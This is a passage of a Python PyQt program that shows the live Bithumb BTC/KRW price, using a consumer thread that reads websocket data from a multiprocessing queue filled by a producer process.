    def __init__(self, q):
        super().__init__()
        # multiprocessing.Queue shared with the producer process.
        self.q = q

    def run(self):
        while True:
            # Bug fix: read from the queue passed to this instance (self.q)
            # rather than the module-level global ``q``, which only exists
            # when the file is run as a script. A blocking get() also avoids
            # the previous busy-wait on ``empty()``.
            data = self.q.get()
            self.poped.emit(data)
class MyWindow(QMainWindow):
    """Main window showing the live BTC/KRW price received from the producer process."""

    def __init__(self, q):
        super().__init__()
        self.setGeometry(200, 200, 400, 200)
        self.setWindowTitle("Bithumb Websocket with PyQt")

        # Bug fix: build the widgets *before* starting the consumer thread so
        # an early `poped` signal cannot invoke print_data() while
        # self.line_edit does not exist yet.
        self.label = QLabel("Bitcoin: ", self)
        self.label.move(10, 10)

        # QLineEdit
        self.line_edit = QLineEdit(" ", self)
        self.line_edit.resize(150, 30)
        self.line_edit.move(100, 10)

        # thread for data consumer
        self.consumer = Consumer(q)
        self.consumer.poped.connect(self.print_data)
        self.consumer.start()

    @pyqtSlot(dict)
    def print_data(self, data):
        """Slot: update the price display and status bar from one payload."""
        content = data.get('content')
        if content is not None:
            current_price = int(content.get('closePrice'))
            self.line_edit.setText(format(current_price, ",d"))
        now = datetime.datetime.now()
        self.statusBar().showMessage(str(now))
if __name__ == "__main__":
    # Cross-process queue: the producer process pushes websocket payloads,
    # the Consumer thread in this process pops them.
    # NOTE(review): Consumer.run reads this ``q`` as a module-level global,
    # so this name must stay ``q`` unless Consumer is fixed to use self.q.
    q = mp.Queue()
    # daemon=True so the producer dies together with the GUI process.
    p = mp.Process(name="Producer", target=producer, args=(q,), daemon=True)
    p.start()

    # Main process
    app = QApplication(sys.argv)
    mywindow = MyWindow(q)
    mywindow.show()
    app.exec_()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.